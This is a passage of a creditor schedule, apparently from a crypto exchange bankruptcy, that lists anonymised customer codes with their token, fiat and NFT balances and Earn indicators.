| 07341778 | | BTC[.00648879], DOGE[144.17683914], MATIC[132.33491428], USD[0.00] | Yes | |
| 07341779 | | BRZ[1], CUSDT[3], DOGE[8.35897512], GRT[6.91537715], SHIB[2], TRX[4], USD[1053.69], USDT[0] | Yes | |
| 07341780 | | TRX[1], USD[0.00], USDT[9.94506742] | | |
| 07341781 | | USD[10.00] | | |
| 07341782 | | DOGE[1], USD[0.01] | Yes | |
| 07341783 | | DOGE[2900.47606601], USD[0.00] | | |
| 07341784 | | CUSDT[2], DOGE[249.52405023], USD[15.00] | | |
| 07341785 | | USD[10.00] | | |
| 07341786 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07341787 | | DOGE[29.15047357], USD[0.00] | | |
| 07341788 | | USD[10.00] | | |
| 07341789 | | CUSDT[1], USD[12.97] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341790 | | USD[10.00] | | |
| 07341791 | | USD[10.00] | | |
| 07341792 | | USD[10.00] | | |
| 07341793 | | CUSDT[3], TRX[128.21501643], USD[0.00] | | |
| 07341794 | | USD[0.01] | | |
| 07341795 | | USD[10.00] | | |
| 07341796 | | USD[10.00] | | |
| 07341797 | | CUSDT[1], DOGE[1], GRT[1], USD[0.00] | | |
| 07341798 | | USD[10.00] | | |
| 07341799 | | USD[0.00] | | |
| 07341800 | | USD[10.00] | | |
| 07341801 | | USD[10.00] | | |
| 07341802 | | CUSDT[5], USD[0.01] | | |
| 07341803 | | ETH[.00283572], ETHW[.00283572], USD[0.00] | | |
| 07341804 | | DOGE[177.9098897], USD[0.00] | | |
| 07341805 | | BRZ[5.05694258], BTC[.00000006], DOGE[13.42468384], ETHW[.01928683], LINK[.00034858], SHIB[8], SOL[.00077994], USD[0.00] | Yes | |
| 07341806 | | DOGE[0], USD[0.00] | | |
| 07341807 | | USD[60.00], USDT[0] | | |
| 07341808 | | BRZ[3], BTC[.00021681], CUSDT[1], TRX[3], USD[0.00], USDT[0] | | |
| 07341810 | | USD[10.00] | | |
| 07341811 | | USD[10.00] | | |
| 07341812 | | USD[10.00] | | |
| 07341813 | | USD[10.00] | | |
| 07341814 | | DOGE[1], USD[0.00] | | |
| 07341815 | | BRZ[2], CUSDT[6], DOGE[60.26646243], TRX[6], USD[0.00] | Yes | |
| 07341816 | | USD[10.00] | | |
| 07341817 | | DOGE[0], TRX[1], USD[10.00] | | |
| 07341818 | | USD[10.00] | | |
| 07341819 | | USD[0.01] | | |
| 07341820 | | BRZ[3], CUSDT[7], DOGE[150.91933958], SHIB[734069.77824274], TRX[6], USD[0.00] | Yes | |
| 07341821 | | CUSDT[1], SUSHI[.68086738], USD[0.00] | | |
| 07341822 | | USD[10.00] | | |
| 07341823 | | CUSDT[1], ETH[.05044498], ETHW[.05044498], LTC[.03365943], SUSHI[.1666163], TRX[1], USD[0.00] | | |
| 07341824 | | BTC[0], CUSDT[1], TRX[1], USD[0.01] | | |
| 07341825 | | USD[10.00] | | |
| 07341826 | | DOGE[0], USD[0.01] | Yes | |
| 07341827 | | USD[10.00] | | |
| 07341828 | | USD[10.00] | | |
| 07341829 | | USD[10.00] | | |
| 07341831 | | USD[10.00] | | |
| 07341832 | | USD[10.00] | | |
| 07341833 | | USD[3.64] | | |
| 07341834 | | USD[10.00] | | |
| 07341835 | | USD[10.00] | | |
| 07341836 | | DOGE[28.36218119], USD[0.00] | | |
| 07341837 | | USD[10.00] | | |
| 07341838 | | GRT[11.80096999], LTC[12.41268608], USD[0.00] | Yes | |
| 07341839 | | GRT[.00458169], USD[0.09] | | |
| 07341840 | | DOGE[1], USD[0.01] | | |
| 07341841 | | USD[10.00] | | |
| 07341843 | | BRZ[0], DOGE[1], GRT[0], SUSHI[0], USD[0.00] | | |
| 07341844 | | USD[0.00] | | |
| 07341845 | | BTC[0.00004670], LTC[.00308], SOL[.0108], USD[0.00] | | |
| 07341846 | | USD[0.01] | | |
| 07341847 | | USD[10.00] | | |
| 07341848 | | USD[10.00] | | |
| 07341849 | | USD[10.00] | | |
| 07341850 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity|NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341851 | | DOGE[1], SOL[17.88372576], USD[0.00] | Yes | |
| 07341852 | | USD[10.00] | | |
| 07341853 | | USD[10.00] | | |
| 07341854 | | USD[10.00] | | |
| 07341855 | | CUSDT[3], DOGE[1], TRX[2], USD[10.00], USDT[1] | | |
| 07341856 | | USD[0.04] | | |
| 07341857 | | USD[10.00] | | |
| 07341859 | | CUSDT[1], USD[0.00] | | |
| 07341861 | | USD[10.00] | | |
| 07341862 | | BRZ[4], BTC[0], CUSDT[32], DOGE[5.03135498], ETH[0], NEAR[13.28555561], SHIB[1], TRX[7], USD[0.03], USDT[1.10105003] | Yes | |
| 07341863 | | USD[10.00] | | |
| 07341864 | | ETH[.00307837], ETHW[.00307837], USD[0.00] | | |
| 07341865 | | BF_POINT[300], BRZ[1], CUSDT[4], NFT (328882638516350325/BTC Jack)[1], NFT (413532339247428503/Bitcoin Mona Lisa)[1], NFT (454070966492129938/ADA Jack)[1], NFT (569302596994225019/NFT Black)[1], TRX[1], USD[0.00] | | |
| 07341866 | | USD[10.00] | | |
| 07341867 | | BAT[4.6330558], BRZ[13.57555015], CUSDT[13.58909772], DAI[.99300398], DOGE[0], ETH[.013245], ETHW[.013245], LINK[.4597821], SOL[.03031449], SUSHI[.73633425], TRX[31.220972], USD[0.00], USDT[2.00573181] | | |
| 07341868 | | BRZ[0], CUSDT[1], DOGE[0], ETH[0], USD[70.67] | Yes | |
| 07341870 | | CUSDT[3], DOGE[125.33189439], GRT[11.09379348], USD[0.00] | Yes | |
| 07341871 | | USD[10.00] | | |
| 07341872 | | USD[10.00] | | |
| 07341873 | | CUSDT[2], DOGE[42.96838583], ETH[.00482587], ETHW[.00482587], USD[0.51] | | |
| 07341874 | | BCH[.00219831], BTC[.00025143], DOGE[8.60041654], USD[0.00], USDT[0.00000001] | Yes | |
| 07341875 | | USD[10.00] | | |
| 07341876 | | CUSDT[9], DOGE[2857.42976495], ETH[.11728921], ETHW[.11615404], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07341878 | | USD[10.00] | | |
| 07341879 | | USD[0.01] | | |
| 07341880 | | BRZ[3], CUSDT[5], TRX[5], USD[0.00] | | |
| 07341881 | | USD[10.00] | | |
| 07341882 | | DOGE[.00005801], ETH[.0896217], ETHW[.08858028], SHIB[408443.40535309], USD[0.00] | Yes | |
| 07341883 | | BRZ[2], BTC[.0118788], CUSDT[9], DOGE[76.3174873], ETH[.03701538], ETHW[.03655415], TRX[1], USD[27.91] | Yes | |
| 07341884 | | USD[10.00] | | |
| 07341885 | | SHIB[1], TRX[1], USD[0.00] | | |
| 07341886 | | CUSDT[3], KSHIB[.17012678], SHIB[2273.13217919], TRX[.5], USD[0.00], USDT[.31838482] | Yes | |
| 07341887 | | USD[10.00] | | |
| 07341889 | | BRZ[2], CUSDT[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07341890 | | USD[10.00] | | |
| 07341891 | | DOGE[1], USD[0.00] | Yes | |
| 07341892 | | USD[10.00] | | |
| 07341893 | | USD[10.00] | | |
| 07341894 | | BRZ[3], CUSDT[2], DOGE[806.58476803], TRX[4], USD[0.00] | | |
| 07341895 | | USD[0.00] | | |
| 07341896 | | USD[0.00] | | |
| 07341897 | | USD[10.00] | | |
| 07341898 | | DOGE[.00007636], USD[0.00] | Yes | |
| 07341899 | | BRZ[2], BTC[0], CUSDT[3], DAI[0], DOGE[1], GRT[0], LTC[0], USD[0.00], USDT[0] | | |
| 07341900 | | BAT[6.50330658], BCH[0], BRZ[6.38342253], BTC[0], CHF[0.00], CUSDT[7], DOGE[8.22179437], ETH[0], ETHW[0], GRT[1.00450130], LINK[53.93944146], LTC[0], MATIC[0], SHIB[1], SOL[0.00052128], SUSHI[0], TRX[4], UNI[0], USD[0.00], USDT[2.21425833], YFI[0] | Yes | |
| 07341901 | | USD[10.00] | | |
| 07341902 | | USD[10.00] | | |
| 07341904 | | BTC[.0000006], CUSDT[4], DOGE[1], SUSHI[.00008397], TRX[1], USD[0.00] | | |
| 07341905 | | USD[10.00] | | |
| 07341906 | | USD[10.00] | | |
| 07341907 | | USD[10.00] | | |
| 07341908 | | USD[10.76] | Yes | |
| 07341909 | | CUSDT[.40918133], USD[0.00] | | |
| 07341910 | | USD[10.00] | | |
| 07341911 | | BCH[.00939601], DOGE[114.42375345], ETH[.00279659], ETHW[.00279659], GRT[3.10247477], USD[0.05], USDT[.99011689] | | |
| 07341912 | | USD[10.00] | | |
| 07341913 | | DOGE[23.47104507], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341914 | | CUSDT[9], DOGE[70.18230037], SHIB[579542.16169226], USD[0.08] | | |
| 07341915 | | DOGE[1605.19111351], USD[0.04] | Yes | |
| 07341916 | | USD[10.00] | | |
| 07341917 | | USD[0.01], USDT[0] | Yes | |
| 07341918 | | USD[10.00] | | |
| 07341919 | | USD[10.00] | | |
| 07341920 | | DOGE[.11116807], TRX[.00071779], USD[1081.75], USDT[1.00005478] | Yes | |
| 07341921 | | USD[10.00] | | |
| 07341923 | | CUSDT[3], DOGE[.00000671], TRX[3], USD[0.00] | | |
| 07341924 | | BRZ[1], CUSDT[1], DOGE[1.40796722], GRT[1], USD[0.00] | | |
| 07341925 | | BAT[2], CUSDT[4], DOGE[0], TRX[3], USD[0.00] | | |
| 07341926 | | DOGE[134.79452394], USD[0.00] | | |
| 07341927 | | CUSDT[1], SHIB[947841.87874677], TRX[0], USD[0.00] | Yes | |
| 07341928 | | USD[10.00] | | |
| 07341929 | | CUSDT[1], DOGE[570.9212376], ETHW[.01141315], SUSHI[0], USD[0.00] | Yes | |
| 07341930 | | DOGE[1], USD[0.01] | | |
| 07341931 | | BAT[1.0165555], BRZ[5.07952967], CUSDT[11], DOGE[.03931856], SOL[.05914924], TRX[7], USD[0.00] | Yes | |
| 07341932 | | BRZ[1], CUSDT[3], DOGE[.06956852], GRT[1], TRX[1], USD[75.49] | | |
| 07341933 | | USD[10.00] | | |
| 07341934 | | USD[10.94] | Yes | |
| 07341935 | | ETH[.00006822], ETHW[.00006822], USD[0.00] | | |
| 07341936 | | USD[10.00] | | |
| 07341938 | | USD[10.00] | | |
| 07341939 | | USD[10.00] | | |
| 07341940 | | DOGE[2], USD[0.91] | | |
| 07341941 | | USD[10.00] | | |
| 07341942 | | DOGE[.0634658], USD[0.00] | | |
| 07341943 | | ALGO[0], AVAX[0], BAT[0], DOGE[0], GRT[0], MATIC[0], SHIB[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07341944 | | USD[10.00] | | |
| 07341945 | | USD[10.00] | | |
| 07341946 | | CUSDT[229.04354621], TRX[45.84271702], USD[0.72] | | |
| 07341947 | | USD[10.00] | | |
| 07341948 | | USD[10.00] | | |
| 07341949 | | TRX[2], USD[0.01] | | |
| 07341950 | | TRX[81.33639602], USD[0.00] | | |
| 07341951 | | USD[10.00] | | |
| 07341952 | | USD[10.00] | | |
| 07341953 | | CUSDT[467.76285893], DOGE[2], USD[0.00] | | |
| 07341955 | | USD[10.00] | | |
| 07341956 | | BTC[.00008148] | | |
| 07341957 | | USD[10.00] | | |
| 07341958 | | USD[10.00] | | |
| 07341959 | | USD[10.00] | | |
| 07341960 | | CUSDT[468.33647352], USD[0.00] | | |
| 07341961 | | USD[10.00] | | |
| 07341962 | | BAT[136.10195111], BRZ[5.07952967], BTC[.09736653], CUSDT[90.60026481], DOGE[2744.07525968], ETH[.40022301], ETHW[.40005146], GRT[218.42651249], MATIC[67.61931895], SHIB[3165354.82859012], SOL[.26841382], SUSHI[4.49332992], TRX[1091.19378347], UNI[5.04257858], USD[113.67] | Yes | |
| 07341963 | | CUSDT[.19923122], DOGE[23.68971438], TRX[1], USD[0.00] | | |
| 07341964 | | USD[10.00] | | |
| 07341965 | | BRZ[51.86480691], CUSDT[1], USD[0.00] | | |
| 07341966 | | CUSDT[12], DOGE[1], LINK[.07792265], SHIB[1], SUSHI[.00277239], USD[5.34] | Yes | |
| 07341967 | | USD[0.01] | | |
| 07341968 | | USD[10.00] | | |
| 07341969 | | BTC[.00001452], DOGE[4.31142883], USD[0.00] | | |
| 07341970 | | BRZ[1], CUSDT[16], DOGE[118.85176926], GRT[1], MATIC[.00050497], SHIB[455671.65592978], SOL[.10316993], SUSHI[1.4947708], USD[0.00] | Yes | |
| 07341971 | | USD[10.00] | | |
| 07341972 | | DOGE[19.98656103], USD[0.00] | | |
| 07341973 | | USD[10.00] | | |
| 07341974 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341975 | | USD[10.00] | | |
| 07341976 | | USD[10.00] | | |
| 07341977 | | BF_POINT[300], BTC[0], DOGE[9.06358742], MATIC[0], SHIB[96051.70887736], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07341978 | | BAT[1], BRZ[5], CUSDT[3], SUSHI[0], TRX[2], USD[0.00], USDT[1] | | |
| 07341979 | | CUSDT[5], DOGE[.01297582], SHIB[3], USD[105.66] | Yes | |
| 07341980 | | USD[10.00] | | |
| 07341981 | | USD[0.00], YFI[.00020953] | | |
| 07341982 | | BRZ[1], CUSDT[2], DOGE[680.77351955], ETH[0.01674426], ETHW[0.01674426], TRX[118.60683000], USD[0.00] | | |
| 07341983 | | USD[10.00] | | |
| 07341984 | | BAT[1.0165555], BTC[0], DOGE[1], GRT[0], MATIC[0], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07341985 | | NFT (441660048492921209/Entrance Voucher #2969)[1], SOL[0], USD[0.00] | Yes | |
| 07341986 | | GRT[3.86873086], USD[0.00] | Yes | |
| 07341987 | | BAT[1414.03356456], BF_POINT[300], DOGE[1], ETH[.0011553], ETHW[218.90208731], GRT[21385.93762947], LINK[353.55494221], SHIB[249168748.00370672], UNI[140.65496334], USD[5.94] | Yes | |
| 07341990 | | USD[10.00] | | |
| 07341991 | | USD[0.00] | | |
| 07341993 | | DOGE[.356], USD[0.00] | | |
| 07341994 | | USD[10.00] | | |
| 07341995 | | DOGE[1], USD[0.01] | | |
| 07341996 | | USD[10.00] | | |
| 07341997 | | USD[10.00] | | |
| 07341998 | | TRX[3], USD[0.00] | | |
| 07341999 | | USD[0.39], USDT[0] | | |
| 07342001 | | DOGE[1], USD[0.00] | | |
| 07342002 | | CUSDT[1], USD[0.03] | | |
| 07342003 | | BAT[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], EUR[0.00], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07342004 | | CUSDT[2], DOGE[9.60464746], ETH[.12644611], ETHW[.12531734], LTC[2.12692566], TRX[5], USD[55.44], USDT[1.10871857] | Yes | |
| 07342005 | | BRZ[2], CUSDT[11], DOGE[1], SHIB[8957984.68047934], TRX[1], USD[0.00] | | |
| 07342006 | | CUSDT[1], DOGE[1], SHIB[3], USD[0.00] | | |
| 07342007 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07342008 | | CUSDT[1], DOGE[5631.36795087], TRX[2], USD[0.01] | | |
| 07342009 | | USD[10.00] | | |
| 07342011 | | USD[0.00], USDT[0] | | |
| 07342012 | | USD[10.00] | | |
| 07342013 | | SHIB[3523131.67259786], USD[0.00], USDT[0.57000000] | | |
| 07342014 | | BRZ[2], BTC[.00019013], CUSDT[2], TRX[2], USD[0.00], USDT[1] | | |
| 07342015 | | DOGE[39.80500493], USD[0.00] | Yes | |
| 07342016 | | USD[10.00] | | |
| 07342017 | | USD[10.00] | | |
| 07342018 | | TRX[167.86353366], USD[0.00] | | |
| 07342020 | | BTC[.00020775], USD[0.00] | Yes | |
| 07342022 | | USD[10.00] | | |
| 07342023 | | USD[0.01] | | |
| 07342024 | | USD[10.00] | | |
| 07342026 | | DOGE[2], USD[0.01] | Yes | |
| 07342027 | | CUSDT[28.39103329], ETH[0], USD[0.00] | | |
| 07342028 | | USD[0.20] | | |
| 07342030 | | CUSDT[1], DOGE[143.00476322], TRX[1], USD[0.00] | | |
| 07342031 | | DOGE[1.00849744], USD[0.00] | | |
| 07342033 | | DOGE[0], UNI[0], USD[0.00] | | |
| 07342034 | | USD[10.00] | | |
| 07342035 | | BRZ[3], CUSDT[2], TRX[1], USD[1722.65], USDT[0.00010091] | | |
| 07342036 | | USD[10.00] | | |
| 07342037 | | USD[10.00] | | |
| 07342038 | | USD[10.00] | | |
| 07342040 | | TRX[237.85626317], USD[0.00] | Yes | |
| 07342041 | | USD[0.00] | | |
| 07342043 | | BTC[0.00008370], CUSDT[17], DOGE[3.57487922], ETH[0.00020620], ETHW[0.00020620], LTC[0.00641849], SHIB[17608.73393203], SOL[0.00402947], SUSHI[0.06868331], TRX[7], UNI[0], USD[0.00] | Yes | |
| 07342044 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342045 | | BF_POINT[100], CUSDT[1], LINK[0], NFT (38239660436788390/FTX - Off The Grid Miami #5426)[1], TRX[112.09739209], USD[0.00] | Yes | |
| 07342046 | | USD[10.00] | | |
| 07342047 | | USD[10.00] | | |
| 07342048 | | BAT[1.0165555], BRZ[1], CUSDT[3], DOGE[0], TRX[3], USD[0.09], USDT[0 | Yes | |
| 07342049 | | USD[10.00] | | |
| 07342050 | | BRZ[2], USD[0.01] | | |
| 07342051 | | USD[0.00] | | |
| 07342052 | | USD[10.00] | | |
| 07342053 | | USD[10.00] | | |
| 07342056 | | DOGE[0], SHIB[8113.25101271], SOL[0], USD[0.00] | Yes | |
| 07342057 | | CUSDT[1], GRT[4.72585979], USD[0.00] | Yes | |
| 07342058 | | USD[10.00] | | |
| 07342059 | | BRZ[0], BTC[0], USD[0.00], USDT[0] | | |
| 07342060 | | BTC[0], DOGE[0.00003997], LINK[0], SOL[0], TRX[1.02703289], USD[0.00] | | |
| 07342061 | | USD[10.00] | | |
| 07342063 | | CUSDT[1], DOGE[1.00004143], USD[0.01] | | |
| 07342064 | | BAT[0], BRZ[1], BTC[0], DOGE[0], LTC[0], TRX[3], USD[0.00] | Yes | |
| 07342065 | | USD[10.00] | | |
| 07342066 | | DOGE[263.82764902], TRX[178.21579106], USD[0.00] | | |
| 07342067 | | USD[10.00] | | |
| 07342068 | | USD[10.00] | | |
| 07342069 | | ETH[.00566739], ETHW[.00566739], USD[0.00] | | |
| 07342070 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07342071 | | CUSDT[7], DOGE[60.53291502], TRX[123.93030731], USD[40.96] | Yes | |
| 07342072 | | BRZ[2], CUSDT[1], MATIC[.05954153], SHIB[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07342073 | | DOGE[8248.83063428], SHIB[543.6429752], USD[0.08] | Yes | |
| 07342074 | | BRZ[1], DOGE[ 42133348], USD[117.21] | | |
| 07342075 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07342076 | | USD[10.00] | | |
| 07342077 | | USD[10.00] | | |
| 07342078 | | USD[10.00] | | |
| 07342079 | | USD[0.10] | | |
| 07342081 | | BAT[2], BRZ[2], CUSDT[1], DOGE[1], TRX[1], USD[2.48], USDT[1] | | |
| 07342082 | | USD[10.00] | | |
| 07342083 | | USD[0.00] | | |
| 07342084 | | DOGE[1], USD[0.01], USDT[0] | | |
| 07342086 | | DOGE[124.05396446], USD[0.00] | | |
| 07342087 | | USD[10.00] | | |
| 07342088 | | USD[10.00] | | |
| 07342089 | | BAT[0], CAD[0.00], CUSDT[1], DOGE[49.80250321], SOL[0], TRX[0], USD[0.00] | | |
| 07342090 | | BRZ[3], CUSDT[5], ETH[.00032551], ETHW[.00032551], TRX[19.72089788], USD[0.00], USDT[0] | | |
| 07342091 | | LTC[.03092101], TRX[56.80707796], USD[3.09] | | |
| 07342092 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07342093 | | TRX[1], USD[52.07] | | |
| 07342094 | | USD[10.00] | | |
| 07342095 | | BAT[2.01177762], BF_POINT[200], BRZ[2], CUSDT[2], DOGE[1], SOL[0], TRX[5], UNI[.00000427], USD[0.00], USDT[2.09284518] | Yes | |
| 07342096 | | USD[10.00] | | |
| 07342097 | | USD[10.00] | | |
| 07342099 | | USD[10.00] | | |
| 07342101 | | USD[10.00] | | |
| 07342102 | | CUSDT[1], DOGE[831.04201003], TRX[1], USD[0.01], USDT[0] | | |
| 07342103 | | USD[0.00] | | |
| 07342105 | | DOGE[1], USD[0.00] | | |
| 07342106 | | AUD[0.38], BAT[0.90688850], BCH[0.00146448], BRZ[1.3650405], BTC[.00001728], CAD[1.25], CUSDT[29.84353949], DAI[0.24981330], DOGE[7.50363124], ETH[0.00020283], ETHW[0.00020283], EUR[0.25], GBP[0.25], GRT[1.62820891], KSHIB[28.12504311], LINK[0.05555537], MATIC[1.66861217], NFT (340032542180713909/Ravager #1452)[1], NFT (485788630930830503/Ravager #839)[1], PAXG[.00024999], SHIB[1], SOL[0.07812692], SUSHI[0.21843808], TRX[3.75051764], UNI[0.05148115], USD[0.99], USDT[.99428126] | Yes | |
| 07342107 | | BRZ[2], CUSDT[15], DOGE[6878.36329152], LTC[1.04099744], TRX[8.00087675], USD[0.00], USDT[2.19826247] | Yes | |
| 07342108 | | GRT[5.86479674], USD[0.00] | | |
| 07342109 | | BRZ[1], CUSDT[6], GRT[1], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342110 | | CUSDT[2], TRX[1], USD[0.00], USDT[1] | | |
| 07342111 | | USD[0.01] | | |
| 07342112 | | USD[0.00] | | |
| 07342113 | Contingent, Disputed | BCH[0], DOGE[0], ETH[0], LTC[0], SHIB[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07342114 | | BRZ[1], CUSDT[7], DOGE[1.02366734], SOL[.00000029], TRX[4], USD[0.00] | Yes | |
| 07342115 | | USD[0.00] | | |
| 07342116 | | CUSDT[1], USD[0.00] | | |
| 07342117 | | USD[10.00] | | |
| 07342118 | | CUSDT[1], DOGE[224.50669424], TRX[1], USD[0.00] | | |
| 07342119 | | DOGE[1320.678], USD[0.03] | | |
| 07342120 | | DOGE[112911.97462829], TRX[3], USD[0.00] | Yes | |
| 07342121 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07342122 | | USD[2.00] | | |
| 07342124 | | BTC[0], DOGE[0], GBP[0.00], SHIB[140577.31466031], USD[0.00] | Yes | |
| 07342125 | | USD[10.00] | | |
| 07342126 | | USD[10.00] | | |
| 07342127 | | USD[10.00] | | |
| 07342128 | | DOGE[1], USD[0.01] | | |
| 07342129 | | USD[10.00] | | |
| 07342130 | | BRZ[1], CUSDT[1], DOGE[0], GRT[0], TRX[2], USD[0.01] | | |
| 07342131 | | USD[10.00] | | |
| 07342132 | | CUSDT[14], DOGE[6.37126441], SHIB[526070.88689141], TRX[3.32674578], USD[2.41] | | |
| 07342133 | | USD[0.00] | | |
| 07342134 | | BTC[.00182064], DOGE[0], ETH[0], SHIB[3], SOL[.00021968], USD[0.00] | Yes | |
| 07342135 | | USD[10.00] | | |
| 07342136 | | CUSDT[1], USD[0.00] | | |
| 07342137 | | USD[0.00] | | |
| 07342138 | | BF_POINT[300], BTC[.00249796], CUSDT[4], DOGE[5607.44131733], ETH[.03591039], ETHW[.03591039], USD[0.00] | | |
| 07342139 | | BTC[.00003159], USD[8.00] | | |
| 07342140 | | CUSDT[6], ETH[0], TRX[1], USD[0.00] | | |
| 07342141 | | USD[10.00] | | |
| 07342142 | | USD[10.00] | | |
| 07342143 | | BRZ[1], CUSDT[2], DOGE[605.83402274], USD[0.00] | | |
| 07342144 | | BRZ[1], DOGE[1], USD[0.01] | Yes | |
| 07342145 | | BRZ[1], DOGE[.00045959], USD[1.87] | | |
| 07342146 | | USD[10.00] | | |
| 07342149 | | BAT[16.07819559], USD[0.00] | | |
| 07342150 | | BAT[1], DOGE[11084.26130811], SHIB[4713022.71613497], USD[0.62] | Yes | |
| 07342151 | | DOGE[245.23669691], SUSHI[1.03560086], USD[0.01] | | |
| 07342153 | | DOGE[1], USD[0.00] | Yes | |
| 07342154 | | USD[10.00] | | |
| 07342155 | | USD[10.00] | | |
| 07342156 | | BAT[0], BCH[0], BTC[0.00006109], CUSDT[12.09883492], DOGE[55.22406475], ETH[1.65083324], ETHW[1.65013994], LTC[0], SOL[2.86120469], TRX[3], USD[0.61], USDT[1.10954924] | Yes | |
| 07342157 | | USD[0.01] | | |
| 07342158 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07342160 | | CUSDT[1], DOGE[498.88776739], TRX[1], USD[0.01] | | |
| 07342161 | | BAT[1], BRZ[2], CUSDT[1], TRX[2], USD[0.00] | | |
| 07342162 | | BRZ[2], CUSDT[1], DOGE[.00089157], LINK[.00000039], USD[1.06], USDT[0] | Yes | |
| 07342163 | | BAT[15.71015516], DOGE[.57914679], USD[0.00] | Yes | |
| 07342165 | | CUSDT[2], DOGE[286.26959978], USD[0.00] | | |
| 07342166 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07342167 | | USD[7.00] | | |
| 07342168 | | CUSDT[0.00042844], DOGE[3.19601288], ETH[0], GRT[0], SOL[6.49546759], TRX[0], USD[0.00] | Yes | |
| 07342169 | | USD[10.00] | | |
| 07342171 | | SHIB[2], USD[0.00] | | |
| 07342172 | | USD[10.00] | | |
| 07342173 | | BRZ[3], CUSDT[42], DOGE[54352.66211096], TRX[8583.45526335], USD[8.69] | Yes | |
| 07342174 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342176 | | KSHIB[3.52320431], USD[0.00] | Yes | |
| 07342177 | | BRZ[1], CUSDT[2], DOGE[356.09972024], TRX[1], USD[26.16] | | |
| 07342178 | | USD[10.00] | | |
| 07342179 | | USD[10.00] | | |
| 07342180 | | USD[10.00] | | |
| 07342181 | | USD[0.01] | | |
| 07342182 | | BAT[1], BRZ[2], CUSDT[8], TRX[2], USD[0.08] | | |
| 07342183 | | USD[10.00] | | |
| 07342184 | | CUSDT[7], DOGE[.00004034], ETH[.0000001], ETHW[.0000001], TRX[3], USD[0.01] | Yes | |
| 07342185 | | USD[13.77] | | |
| 07342186 | | BRZ[1], CUSDT[1], ETH[.00171243], ETHW[.00171243], GRT[1], LTC[.00000004], TRX[1], USD[518.60] | | |
| 07342187 | | USD[10.00] | | |
| 07342188 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07342189 | | CUSDT[3], DOGE[0], GRT[25.2533834], USD[0.00] | Yes | |
| 07342190 | | CUSDT[1], DOGE[400.71858339], USD[0.00] | | |
| 07342191 | | USD[10.00] | | |
| 07342192 | | USD[10.00] | | |
| 07342193 | | USD[10.00] | | |
| 07342194 | | DOGE[1983.45212675], USD[10.00] | | |
| 07342195 | | USD[10.00] | | |
| 07342196 | | USD[10.00] | | |
| 07342197 | | SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07342198 | | CUSDT[1], USD[0.00] | | |
| 07342199 | | USD[10.00] | | |
| 07342200 | | ETH[.00572869], ETHW[.00572869], NFT (47276104013043177/Coachella x FTX Weekend 1 #8615)[1], USD[0.00] | | |
| 07342201 | | DOGE[18.49762955], USD[0.00] | | |
| 07342202 | | USD[10.00] | | |
| 07342203 | | USD[0.00] | | |
| 07342205 | | USD[10.00] | | |
| 07342206 | | DOGE[2], USD[0.21] | | |
| 07342207 | | USD[0.00] | | |
| 07342209 | | DOGE[2852.85890974], ETH[.01076701], ETHW[.01076701], USD[0.00] | | |
| 07342210 | | CUSDT[1], USD[0.00] | | |
| 07342211 | | DOGE[0], USD[0.00] | | |
| 07342212 | | USD[10.00] | | |
| 07342213 | | BTC[0], DOGE[3.22881341], USD[0.00] | Yes | |
| 07342214 | | DOGE[1], USD[0.00] | | |
| 07342215 | | USD[20.00] | | |
| 07342216 | | USD[10.00] | | |
| 07342217 | | CUSDT[3], DOGE[32594.25852136], MATIC[.04466358], NFT (473167641334690791/Sigma Shark #1298)[1], SHIB[431811.74575453], TRX[1], USD[0.00] | | |
| 07342218 | | USD[10.97] | Yes | |
| 07342219 | | CUSDT[.000045], DOGE[.00000733], TRX[.00001682], USD[0.00] | | |
| 07342220 | | CUSDT[1], USD[0.00] | | |
| 07342221 | | DOGE[42.36287222], USD[0.00] | | |
| 07342222 | | USD[10.00] | | |
| 07342223 | | USD[10.00] | | |
| 07342224 | | CUSDT[3], DOGE[1579.86994176], ETH[.05899524], ETHW[.05826256], LINK[2.88548769], TRX[2], USD[0.00] | Yes | |
| 07342225 | | USD[10.00] | | |
| 07342226 | | CUSDT[2], DOGE[1], USD[0.01] | | |
